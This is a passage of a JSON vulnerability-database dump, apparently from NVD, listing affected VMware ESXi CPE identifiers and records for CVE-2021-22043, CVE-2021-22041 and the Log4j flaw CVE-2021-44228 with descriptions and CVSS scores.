"cpe:2.3:o:vmware:esxi:6.7:670-201906002:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201908205:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201904218-ug:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201810214:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201908208:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201904216:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201904219-ug:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201908214:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201908103:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201810001:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201908216:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201904207-ug:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201904221:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201904217-ug:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201904222-ug:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201901402:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201908218:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201810219:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201904227:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201904223:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201810212:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201904218:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201904224:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201908201:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201904225:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:7.0:update_2:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201810227:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201904205-ug:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201912403:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201904201:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201912401:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201810215:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201807001:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201904206-ug:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201908215:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-202004402:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201810225:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201904226:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201810221:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201908209:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201904220-ug:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201908217:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201904212:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.5:650-202202401:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201904216-ug:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201904219:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201908102:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201904201-ug:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201904228-ug:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201904213:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.5:-:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201810202:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201904215:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201810222:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201810229:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201904214:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201908221:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201904224-ug:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201904215-ug:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201908212:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201904225-ug:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201908104:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201904223-ug:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201810223:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201810226:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201908207:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201904210:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201904205:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201904222:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-202004405:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:7.0:-:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201904221-ug:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201810230:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201904208:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201908202:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201901401:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-202008001:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201904206:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-202011002:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201810210:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201908219:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201810209:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201904226-ug:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-202004001:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201912405:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201908213:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-202004401:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-202103001:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201810204:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-202004404:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201904217:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201810217:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201912101:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201810103:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201810216:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-202004301:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201908206:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201901403:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-202011001:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201810207:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201908203:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201904211-ug:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201810213:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201904207:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201904228:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-202102001:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201806001:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201810224:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201904220:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201904203:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201810231:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201810234:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201810218:*:*:*:*:*:*"]}, {"lastseen": "2023-12-03T14:36:57", "description": "VMware ESXi contains a TOCTOU (Time-of-check Time-of-use) vulnerability that exists in the way temporary files are handled. A malicious actor with access to settingsd, may exploit this issue to escalate their privileges by writing arbitrary files.", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-02-16T17:15:00", "type": "cve", "title": "CVE-2021-22043", "cwe": ["CWE-367"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.0, "vectorString": "AV:N/AC:M/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22043"], "modified": "2022-02-24T19:51:00", "cpe": ["cpe:/o:vmware:esxi:7.0"], "id": "CVE-2021-22043", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-22043", "cvss": {"score": 6.0, "vector": "AV:N/AC:M/Au:S/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:vmware:esxi:7.0:update_2:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:7.0:update_1:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:7.0:update_3:*:*:*:*:*:*"]}, {"lastseen": "2023-12-03T14:36:59", "description": "VMware ESXi, Workstation, and Fusion contain a double-fetch vulnerability in the UHCI USB controller. A malicious actor with local administrative privileges on a virtual machine may exploit this issue to execute code as the virtual machine's VMX process running on the host.", "cvss3": {"exploitabilityScore": 0.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 6.7, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-02-16T17:15:00", "type": "cve", "title": "CVE-2021-22041", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22041"], "modified": "2022-02-24T19:50:00", "cpe": ["cpe:/o:vmware:esxi:7.0", "cpe:/a:vmware:fusion:-", "cpe:/o:vmware:esxi:6.5", "cpe:/o:vmware:esxi:6.7"], "id": "CVE-2021-22041", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-22041", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:vmware:esxi:6.7:670-201908211:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201908210:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-202004002:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201904209-ug:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201904208-ug:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201810233:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201810220:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201912404:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201904202:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201904210-ug:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201912102:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201810102:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201904202-ug:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:7.0:update_1:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201908204:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201903001:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201810203:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201911001:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201908101:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-202004406:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201810228:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:-:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201904212-ug:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201901001:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201810205:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201904214-ug:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-202004407:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201908220:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201904204-ug:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201810206:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201810101:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201904203-ug:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-202004408:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201810208:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201904001:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201811001:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:7.0:update_3:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201904229-ug:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201808001:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201912001:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201912402:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201904209:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201810211:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-202010001:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201810232:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201904229:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-202111101:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201904204:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201905001:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-202004403:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201904227-ug:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201904211:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-202006001:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201810201:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201904213-ug:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201906002:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201908205:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201904218-ug:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201810214:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201908208:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201904216:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201904219-ug:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201908214:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201908103:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201810001:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201908216:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201904207-ug:*:*:*:*:*:*", "cpe:2.3:a:vmware:fusion:-:*:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201904221:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201904217-ug:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201904222-ug:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201901402:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201908218:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201810219:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201904227:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201904223:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201810212:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201904218:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201904224:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201908201:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201904225:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:7.0:update_2:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201810227:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201904205-ug:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201912403:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201904201:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201912401:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201810215:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201807001:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201904206-ug:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201908215:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-202004402:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201810225:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201904226:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201810221:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201908209:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201904220-ug:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201908217:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201904212:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.5:650-202202401:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201904216-ug:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201904219:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201908102:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201904201-ug:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201904228-ug:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201904213:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201810202:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201904215:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201810222:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201810229:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201904214:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201908221:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201904224-ug:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201904215-ug:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201908212:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201904225-ug:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201908104:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201904223-ug:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201810223:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201810226:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201908207:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201904210:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201904205:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201904222:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-202004405:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201904221-ug:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201810230:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201904208:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201908202:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201901401:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-202008001:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201904206:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-202011002:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201810210:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201908219:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201810209:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201904226-ug:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-202004001:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201912405:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201908213:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-202004401:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-202103001:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201810204:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-202004404:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201904217:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201810217:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201912101:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201810103:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201810216:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-202004301:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201908206:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201901403:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-202011001:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201810207:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201908203:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201904211-ug:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201810213:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201904207:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201904228:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-202102001:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201806001:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201810224:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201904220:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201904203:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201810231:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201810234:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.7:670-201810218:*:*:*:*:*:*"]}, {"lastseen": "2023-12-03T16:09:15", "description": "Apache Log4j2 2.0-beta9 through 2.15.0 (excluding security releases 2.12.2, 2.12.3, and 2.3.1) JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j 2.15.0, this behavior has been disabled by default. From version 2.16.0 (along with 2.12.2, 2.12.3, and 2.3.1), this functionality has been completely removed. Note that this vulnerability is specific to log4j-core and does not affect log4net, log4cxx, or other Apache Logging Services projects.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-10T10:15:00", "type": "cve", "title": "CVE-2021-44228", "cwe": ["CWE-20", "CWE-400", "CWE-502"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2023-11-07T03:39:00", "cpe": ["cpe:/a:cisco:identity_services_engine:003.000\$000.458\$", "cpe:/a:siemens:head-end_system_universal_device_integration_system:*", "cpe:/a:cisco:crosswork_optimization_engine:3.0.0", "cpe:/a:cisco:connected_analytics_for_network_deployment:7.3", "cpe:/a:cisco:cyber_vision:4.0.2", "cpe:/a:siemens:energyip:8.7", "cpe:/a:cisco:unified_communications_manager:11.5\$1.21900.40\$", "cpe:/a:intel:oneapi_sample_browser:-", "cpe:/a:cisco:identity_services_engine:003.001\$000.518\$", "cpe:/a:cisco:common_services_platform_collector:002.009\$001.000\$", "cpe:/a:siemens:logo\\!_soft_comfort:*", "cpe:/a:cisco:connected_analytics_for_network_deployment:007.003.001.001", "cpe:/a:cisco:paging_server:9.1\$1\$", "cpe:/a:siemens:siguard_dsa:4.4", "cpe:/a:intel:system_studio:-", "cpe:/a:intel:system_debugger:-", "cpe:/a:siemens:mendix:*", "cpe:/a:siemens:sentron_powermanager:4.1", "cpe:/a:cisco:evolved_programmable_network_manager:3.0", "cpe:/a:siemens:xpedition_package_integrator:-", "cpe:/a:cisco:network_dashboard_fabric_controller:11.1\$1\$", 